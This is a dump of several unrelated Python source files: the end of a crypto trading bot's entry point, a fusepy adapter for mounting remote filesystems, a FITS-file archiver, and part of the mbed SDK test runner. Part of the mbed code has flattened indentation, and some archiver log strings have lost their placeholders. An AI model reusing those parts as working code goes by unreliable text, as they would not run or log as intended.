        storage['selling'] = storage['resistance']
    storage['mid_market'] = (storage['buying'] + storage['selling']) / 2
# PRIMARY PROCESS
# PRIMARY PROCESS entry point: install config, run backtest and/or go live.
# NOTE(review): original indentation was flattened in this dump; the
# nesting below is reconstructed -- confirm against the canonical source.
if __name__ == "__main__":
    print('')
    print(VERSION)
    print('')
    # install tuning constants and API keys into the module namespace
    tune_install()
    keys_install()
    asset_cap, asset_dominance, asset_rank = marketcap()
    optimize = False
    data = {}
    control_panel()
    if LATENCY:
        # latency-test mode: probe the data feeds then exit
        nodes_update()
        price, volume, latency = cryptocompare_last()
        cryptocompare_time()
        sys.exit()
    if MODE in [2, 3]:
        # initialize data feeds
        last_update()
        book_update()
    # shared state dicts and historical data
    dictionaries()
    initialize()
    test_initialize()
    coin_name()
    if (MODE in [2, 3]) or BACKTEST:
        backtest()
        print_tune()
    if MODE in [2, 3]:
        # begin background processes (non-daemon feed updaters)
        p_node = Process(target=nodes_loop)
        p_node.daemon = False
        p_node.start()
        p_last = Process(target=last_loop)
        p_last.daemon = False
        p_last.start()
        p_book = Process(target=book_loop)
        p_book.daemon = False
        p_book.start()
        # start live event loop
        live()
    if OPTIMIZE:
        print ('https://www.youtube.com/watch?v=5ydqjqZ_3oc')
    sys.exit()
#=======================================================================
''' EXTINCTION EVENT '''
#=======================================================================
#
# THE DESTROYER,
# litepresence - 2018
#
|
fuse.py | from __future__ import print_function
import os
import stat
from errno import ENOENT, EIO
from fuse import Operations, FuseOSError
import threading
import time
import pandas as pd
from fuse import FUSE
def str_to_time(s):
    """Parse a date-like string to POSIX epoch seconds as a float."""
    # Timestamp.value is nanoseconds since the epoch
    return pd.to_datetime(s).value / 1e9
class FUSEr(Operations):
    """fusepy ``Operations`` adapter serving an fsspec-style filesystem.

    Paths received from FUSE are joined onto ``self.root`` (the remote
    root).  Open file objects live in ``self.cache``, keyed by integer
    file handles issued from the monotonically increasing ``self.counter``.
    """
    def __init__(self, fs, path):
        # fs: the backing filesystem instance; path: remote root directory
        self.fs = fs
        self.cache = {}  # fh (int) -> open file object
        self.root = path.rstrip('/') + '/'  # remote root, '/'-terminated
        self.counter = 0  # next file handle to hand out

    def getattr(self, path, fh=None):
        """Stat *path*: world-accessible perms, dir/file per fs.info type."""
        path = ''.join([self.root, path.lstrip('/')]).rstrip('/')
        try:
            info = self.fs.info(path)
        except FileNotFoundError:
            raise FuseOSError(ENOENT)
        data = {'st_uid': 1000, 'st_gid': 1000}
        perm = 0o777
        if info['type'] != 'file':
            data['st_mode'] = (stat.S_IFDIR | perm)
            data['st_size'] = 0
            data['st_blksize'] = 0
        else:
            data['st_mode'] = (stat.S_IFREG | perm)
            data['st_size'] = info['size']
            data['st_blksize'] = 5 * 2**20  # 5 MiB block size
        data['st_nlink'] = 1
        # backing stores rarely expose timestamps; report "now" for all
        data['st_atime'] = time.time()
        data['st_ctime'] = time.time()
        data['st_mtime'] = time.time()
        return data

    def readdir(self, path, fh):
        """List base names in *path* plus the conventional '.' and '..'."""
        path = ''.join([self.root, path.lstrip('/')])
        files = self.fs.ls(path, False)
        files = [os.path.basename(f.rstrip('/')) for f in files]
        return ['.', '..'] + files

    def mkdir(self, path, mode):
        # mode is ignored; the backing fs decides permissions
        path = ''.join([self.root, path.lstrip('/')])
        self.fs.mkdir(path)
        return 0

    def rmdir(self, path):
        path = ''.join([self.root, path.lstrip('/')])
        self.fs.rmdir(path)
        return 0

    def read(self, path, size, offset, fh):
        """Read *size* bytes at *offset* from the cached file object."""
        f = self.cache[fh]
        f.seek(offset)
        out = f.read(size)
        return out

    def write(self, path, data, offset, fh):
        # NOTE(review): *offset* is ignored -- writes go to the current
        # cursor, so presumably only sequential writes are supported.
        f = self.cache[fh]
        f.write(data)
        return len(data)

    def create(self, path, flags, fi=None):
        """Create a file for writing and return a new file handle."""
        fn = ''.join([self.root, path.lstrip('/')])
        f = self.fs.open(fn, 'wb')
        self.cache[self.counter] = f
        self.counter += 1
        return self.counter - 1

    def open(self, path, flags):
        """Open for read (even flags) or write (odd flags); return a handle."""
        fn = ''.join([self.root, path.lstrip('/')])
        if flags % 2 == 0:
            # read -- O_RDONLY leaves the low bit clear
            mode = 'rb'
        else:
            # write/create
            mode = 'wb'
        self.cache[self.counter] = self.fs.open(fn, mode)
        self.counter += 1
        return self.counter - 1

    def truncate(self, path, length, fh=None):
        """Only truncation to zero length is supported (touches the file)."""
        fn = ''.join([self.root, path.lstrip('/')])
        if length != 0:
            raise NotImplementedError
        # maybe should be no-op since open with write sets size to zero anyway
        self.fs.touch(fn)

    def unlink(self, path):
        """Remove a file; surface any failure as a generic I/O error."""
        fn = ''.join([self.root, path.lstrip('/')])
        try:
            self.fs.rm(fn, False)
        except (IOError, FileNotFoundError):
            raise FuseOSError(EIO)

    def release(self, path, fh):
        """Close and drop the file object for *fh*; always reports success."""
        try:
            if fh in self.cache:
                f = self.cache[fh]
                f.close()
                self.cache.pop(fh)
        except Exception as e:
            print(e)
        return 0

    def chmod(self, path, mode):
        raise NotImplementedError
def run(fs, path, mount_point, foreground=True, threads=False):
    """ Mount stuff in a local directory

    Uses fusepy to expose *path* on the file-system instance *fs* at the
    local directory *mount_point*, so that it appears to live on the local
    file-system.  Requires fusepy to be installed and FUSE to be available
    on the host (typically via apt, yum, brew, etc.).

    Parameters
    ----------
    fs : file-system instance
        From one of the compatible implementations
    path : str
        Location on that file-system to regard as the root directory to
        mount; you typically should include the terminating "/" character.
    mount_point : str
        An empty directory on the local file-system where the contents of
        the remote path will appear.
    foreground : bool
        Whether or not calling this function will block.  Operation will
        typically be more stable if True.
    threads : bool
        Whether or not to create threads when responding to file operations
        within the mounted directory.  Operation will typically be more
        stable if False.
    """
    def _serve():
        # FUSE itself always runs foreground here; backgrounding is done
        # by hosting the call in a daemon thread below.
        FUSE(FUSEr(fs, path), mount_point,
             nothreads=not threads, foreground=True)

    if foreground is False:
        worker = threading.Thread(target=_serve)
        worker.daemon = True
        worker.start()
        return worker
    else:  # pragma: no cover
        try:
            _serve()
        except KeyboardInterrupt:
            pass
|
archiver.py | """ Code to facilitate delayed archiving of FITS files in the images directory """
import os
import time
import queue
import atexit
import shutil
from contextlib import suppress
from threading import Thread
from astropy import units as u
from panoptes.utils.utils import get_quantity_value
from panoptes.utils.time import current_time
from panoptes.pocs.base import PanBase
VALID_EXTENSIONS = (".fits", ".fits.fz")
class Archiver(PanBase):
    """ Class to watch the images directory for new files and move them to the archive directory
    after enough time has passed.
    """
    _valid_extensions = VALID_EXTENSIONS

    def __init__(self, images_directory=None, archive_directory=None, delay_interval=None,
                 sleep_interval=None, status_interval=60, *args, **kwargs):
        """
        Args:
            images_directory (str): The images directory to archive. If None (default), uses
                the directories.images config entry.
            archive_directory (str): The archive directory. If None (default), uses
                the directories.archive config entry.
            delay_interval (u.Quantity): The minimum amount of time a file must spend in the
                archive queue before it is archived. If None (default), uses the
                archiver.delay_time config entry.
            sleep_interval (u.Quantity): The amount of time to sleep in between checking for new
                files to archive. Ideally this should be longer than delay_interval. If None
                (default), uses the archiver.sleep_interval config entry.
            status_interval (float, optional): Sleep for this long between status reports. Default
                60s.
            *args, **kwargs: Parsed to PanBase initialiser.
        """
        super().__init__(*args, **kwargs)

        if images_directory is None:
            images_directory = self.get_config("directories.images")
        self.images_directory = str(images_directory)

        if archive_directory is None:
            archive_directory = self.get_config("directories.archive")
        self.archive_directory = str(archive_directory)
        self.logger.debug(f"Archive directory: {self.archive_directory}")

        if delay_interval is None:
            delay_interval = self.get_config("archiver.delay_interval")
        self.delay_interval = get_quantity_value(delay_interval, u.minute) * u.minute

        if sleep_interval is None:
            sleep_interval = self.get_config("archiver.sleep_interval")
        self.sleep_interval = get_quantity_value(sleep_interval, u.minute) * u.minute

        self._status_interval = get_quantity_value(status_interval, u.second)

        self._n_archived = 0
        self._stop = False
        self._archive_queue = queue.Queue()

        self._status_thread = Thread(target=self._async_monitor_status)
        self._watch_thread = Thread(target=self._async_watch_directory)
        self._archive_thread = Thread(target=self._async_archive_files)
        self._threads = [self._status_thread, self._watch_thread, self._archive_thread]

        atexit.register(self.stop)  # This gets called when python is quit

    @property
    def is_running(self):
        """ bool: True while all three worker threads are alive. """
        return self.status["is_running"]

    @property
    def status(self):
        """ Return a status dictionary.
        Returns:
            dict: The status dictionary.
        """
        status = {"is_running": all([t.is_alive() for t in self._threads]),
                  "status_thread": self._status_thread.is_alive(),
                  "watch_thread": self._watch_thread.is_alive(),
                  # BUG FIX: previously reported the *status* thread's
                  # liveness under the "archive_thread" key
                  "archive_thread": self._archive_thread.is_alive(),
                  "queued": self._archive_queue.qsize(),
                  "archived": self._n_archived}
        return status

    def start(self):
        """ Start archiving. """
        self.logger.info("Starting archiving.")
        self._stop = False
        for thread in self._threads:
            thread.start()

    def stop(self, blocking=True):
        """ Stop archiving.
        Args:
            blocking (bool, optional): If True (default), blocks until all threads have joined.
        """
        self.logger.info("Stopping archiving.")
        self._stop = True
        if blocking:
            for thread in self._threads:
                # RuntimeError is raised when joining a never-started thread
                with suppress(RuntimeError):
                    thread.join()

    def _async_monitor_status(self):
        """ Report the status on a regular interval. """
        self.logger.debug("Starting status thread.")
        while True:
            if self._stop:
                self.logger.debug("Stopping status thread.")
                break
            # Get the current status
            status = self.status
            self.logger.trace(f"Archiver status: {status}")
            if not self.is_running:
                self.logger.warning("Archiver is not running.")
            # Sleep before reporting status again
            time.sleep(self._status_interval)

    def _async_watch_directory(self):
        """ Watch the images directory and add all valid files to the archive queue. """
        self.logger.debug("Starting watch thread.")
        while True:
            if self._stop:
                self.logger.debug("Stopping watch thread.")
                break
            # Loop over filenames and add them to the queue
            # Duplicates are taken care of later on
            for filename in self._get_filenames_to_archive():
                self._archive_queue.put([current_time(), filename])
            # Sleep before checking again
            time.sleep(self.sleep_interval.to_value(u.second))

    def _async_archive_files(self, sleep=10):
        """ Archive files that have been in the queue longer than self.delay_interval.
        Args:
            sleep (float, optional): Sleep for this long while waiting for self.delay_interval to
                expire. Default: 10s.
        """
        while True:
            # Drain the queue fully before honouring a stop request
            if self._stop and self._archive_queue.empty():
                self.logger.debug("Stopping archive thread.")
                break
            # Get the oldest file from the queue
            try:
                track_time, filename = self._archive_queue.get(block=True, timeout=sleep)
            except queue.Empty:
                continue
            # Archive file when it is old enough
            while current_time() - track_time < self.delay_interval:
                time.sleep(sleep)
            # File may have been deleted (or already archived) meanwhile
            with suppress(FileNotFoundError):
                self._archive_file(filename)
                self._n_archived += 1
            # Tell the queue we are done with this file
            self._archive_queue.task_done()

    def _get_filenames_to_archive(self):
        """ Get valid filenames in the images directory to archive.
        Returns:
            list: The list of filenames to archive.
        """
        filenames = []
        # Get all the matching filenames in the images directory
        for path, _, files in os.walk(self.images_directory):
            for name in files:
                # str.endswith accepts a tuple of suffixes directly
                if name.endswith(tuple(self._valid_extensions)):
                    filenames.append(os.path.join(path, name))
        return filenames

    def _get_archive_filename(self, filename):
        """ Get the archive filename from the original filename.
        Args:
            filename (str): The filename string.
        Returns:
            str: The archived file name.
        """
        relpath = os.path.relpath(filename, self.images_directory)
        return os.path.join(self.archive_directory, relpath)

    def _archive_file(self, filename):
        """ Archive the file.
        Args:
            filename (str): The filename string.
        Raises:
            FileNotFoundError: If the file no longer exists.
        """
        if not os.path.exists(filename):  # May have already been archived or deleted
            self.logger.trace(f"Tried to archive (unknown) but it does not exist.")
            raise FileNotFoundError
        # Get the archived filename
        archive_filename = self._get_archive_filename(filename)
        # Make sure the archive directory exists
        os.makedirs(os.path.dirname(archive_filename), exist_ok=True)
        # Move the file to the archive directory
        self.logger.trace(f"Moving (unknown) to {archive_filename}.")
        shutil.move(filename, archive_filename)
|
test_api.py | """
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from copy import copy
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename, relpath
from threading import Thread, Lock
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.memap import MemapParser
from tools.targets import TARGET_MAP
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import prepare_toolchain
from tools.build_api import scan_resources
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
from tools.utils import get_path_depth
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
    """ Daemon thread that continuously drains a child process's stdout,
    one byte at a time, into a Queue so the parent can consume output
    without blocking.  (Python 2 code -- note the `except E, name` syntax.)
    """
    def __init__(self, proc):
        Thread.__init__(self)
        self.proc = proc        # the subprocess.Popen being observed
        self.queue = Queue()    # bytes read from proc.stdout
        self.daemon = True      # do not keep the interpreter alive
        self.active = True      # cleared by stop() to end the run loop
        self.start()

    def run(self):
        # Read single bytes so partial lines are delivered promptly;
        # read(1) blocks until the child produces output or exits.
        while self.active:
            c = self.proc.stdout.read(1)
            self.queue.put(c)

    def stop(self):
        """Stop observing and terminate the child process (best effort)."""
        self.active = False
        try:
            self.proc.terminate()
        except Exception, _:
            pass
class SingleTestExecutor(threading.Thread):
    """ Example: Single test class in separate thread usage

    Wraps a SingleTestRunner so its execute() runs on a background thread,
    then prints the human-readable summaries unless suppressed.
    (Python 2 code -- print statements are intentional.)
    """
    def __init__(self, single_test):
        self.single_test = single_test  # the SingleTestRunner to drive
        threading.Thread.__init__(self)

    def run(self):
        # Time the full test-suite execution for the closing summary line.
        start = time()
        # Execute tests depending on options and filter applied
        test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
        elapsed_time = time() - start
        # Human readable summary
        if not self.single_test.opts_suppress_summary:
            # prints well-formed summary with results (SQL table like)
            print self.single_test.generate_test_summary(test_summary, shuffle_seed)
        if self.single_test.opts_test_x_toolchain_summary:
            # prints well-formed summary with results (SQL table like)
            # table shows text x toolchain test result matrix
            print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
        print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_report_text_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_report_text_file_name = _opts_report_text_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
    def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
        """ Build the mbed SDK, required libraries and test projects for one
        target across all given toolchains, then run the tests.

        Results accumulate in self.test_summary / self.test_summary_ext and
        per-run properties in self.test_suite_properties_ext; a completion
        token is pushed to queue 'q' when this slice finishes.
        """
        for toolchain in toolchains:
            tt_id = "%s::%s" % (toolchain, target)

            T = TARGET_MAP[target]

            # print target, toolchain
            # Test suite properties returned to external tools like CI
            test_suite_properties = {
                'jobs': self.opts_jobs,
                'clean': clean,
                'target': target,
                'vendor': T.extra_labels[0],
                'test_ids': ', '.join(test_ids),
                'toolchain': toolchain,
                'shuffle_random_seed': self.shuffle_random_seed
            }

            # print '=== %s::%s ===' % (target, toolchain)
            # Let's build our test
            # NOTE(review): this guard is effectively dead -- TARGET_MAP[target]
            # above would already have raised KeyError for an unknown target.
            if target not in TARGET_MAP:
                print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
                continue

            build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
            clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None

            try:
                build_mbed_libs_result = build_mbed_libs(T,
                                                         toolchain,
                                                         options=build_mbed_libs_options,
                                                         clean=clean_mbed_libs_options,
                                                         verbose=self.opts_verbose,
                                                         jobs=self.opts_jobs,
                                                         report=build_report,
                                                         properties=build_properties)

                if not build_mbed_libs_result:
                    print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
                    continue
            except ToolException:
                print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
                continue

            build_dir = join(BUILD_DIR, "test", target, toolchain)

            test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
            test_suite_properties['build_dir'] = build_dir
            test_suite_properties['skipped'] = []

            # Enumerate through all tests and shuffle test order if requested
            test_map_keys = sorted(TEST_MAP.keys())

            if self.opts_shuffle_test_order:
                random.shuffle(test_map_keys, self.shuffle_random_func)
                # Update database with shuffle seed f applicable
                if self.db_logger:
                    self.db_logger.reconnect();
                    if self.db_logger.is_connected():
                        self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
                        self.db_logger.disconnect();

            if self.db_logger:
                self.db_logger.reconnect();
                if self.db_logger.is_connected():
                    # Update MUTs and Test Specification in database
                    self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
                    # Update Extra information in database (some options passed to test suite)
                    self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
                    self.db_logger.disconnect();

            valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
            skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)

            for skipped_test_id in skipped_test_map_keys:
                test_suite_properties['skipped'].append(skipped_test_id)

            # First pass through all tests and determine which libraries need to be built
            libraries = []
            for test_id in valid_test_map_keys:
                test = TEST_MAP[test_id]

                # Detect which lib should be added to test
                # Some libs have to compiled like RTOS or ETH
                for lib in LIBRARIES:
                    if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
                        libraries.append(lib['id'])

            build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
            clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None

            # Build all required libraries
            for lib_id in libraries:
                try:
                    build_lib(lib_id,
                              T,
                              toolchain,
                              options=build_project_options,
                              verbose=self.opts_verbose,
                              clean=clean_mbed_libs_options,
                              jobs=self.opts_jobs,
                              report=build_report,
                              properties=build_properties)
                except ToolException:
                    print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
                    continue

            for test_id in valid_test_map_keys:
                test = TEST_MAP[test_id]

                test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)

                # TODO: move this 2 below loops to separate function
                INC_DIRS = []
                for lib_id in libraries:
                    if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
                        INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])

                MACROS = []
                for lib_id in libraries:
                    if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
                        MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
                MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
                MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
                test_uuid = uuid.uuid4()
                MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))

                # Prepare extended test results data structure (it can be used to generate detailed test report)
                if target not in self.test_summary_ext:
                    self.test_summary_ext[target] = {}  # test_summary_ext : toolchain
                if toolchain not in self.test_summary_ext[target]:
                    self.test_summary_ext[target][toolchain] = {}  # test_summary_ext : toolchain : target

                tt_test_id = "%s::%s::%s" % (toolchain, target, test_id)  # For logging only

                project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
                try:
                    path = build_project(test.source_dir,
                                         join(build_dir, test_id),
                                         T,
                                         toolchain,
                                         test.dependencies,
                                         options=build_project_options,
                                         clean=clean_project_options,
                                         verbose=self.opts_verbose,
                                         name=project_name,
                                         macros=MACROS,
                                         inc_dirs=INC_DIRS,
                                         jobs=self.opts_jobs,
                                         report=build_report,
                                         properties=build_properties,
                                         project_id=test_id,
                                         project_description=test.get_description())
                except Exception, e:
                    project_name_str = project_name if project_name is not None else test_id

                    test_result = self.TEST_RESULT_FAIL

                    if isinstance(e, ToolException):
                        print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
                        test_result = self.TEST_RESULT_BUILD_FAILED
                    elif isinstance(e, NotSupportedException):
                        print self.logger.log_line(self.logger.LogType.INFO, 'The project %s is not supported'% (project_name_str))
                        test_result = self.TEST_RESULT_NOT_SUPPORTED

                    # Append test results to global test summary
                    self.test_summary.append(
                        (test_result, target, toolchain, test_id, test.get_description(), 0, 0, '-')
                    )

                    # Add detailed test result to test summary structure
                    if test_id not in self.test_summary_ext[target][toolchain]:
                        self.test_summary_ext[target][toolchain][test_id] = []

                    self.test_summary_ext[target][toolchain][test_id].append({ 0: {
                        'result' : test_result,
                        'output' : '',
                        'target_name' : target,
                        'target_name_unique': target,
                        'toolchain_name' : toolchain,
                        'id' : test_id,
                        'description' : test.get_description(),
                        'elapsed_time' : 0,
                        'duration' : 0,
                        'copy_method' : None
                    }})
                    continue

                if self.opts_only_build_tests:
                    # With this option we are skipping testing phase
                    continue

                # Test duration can be increased by global value
                test_duration = test.duration
                if self.opts_extend_test_timeout is not None:
                    test_duration += self.opts_extend_test_timeout

                # For an automated test the duration act as a timeout after
                # which the test gets interrupted
                test_spec = self.shape_test_request(target, path, test_id, test_duration)
                test_loops = self.get_test_loop_count(test_id)

                test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
                test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
                test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path

                # read MUTs, test specification and perform tests
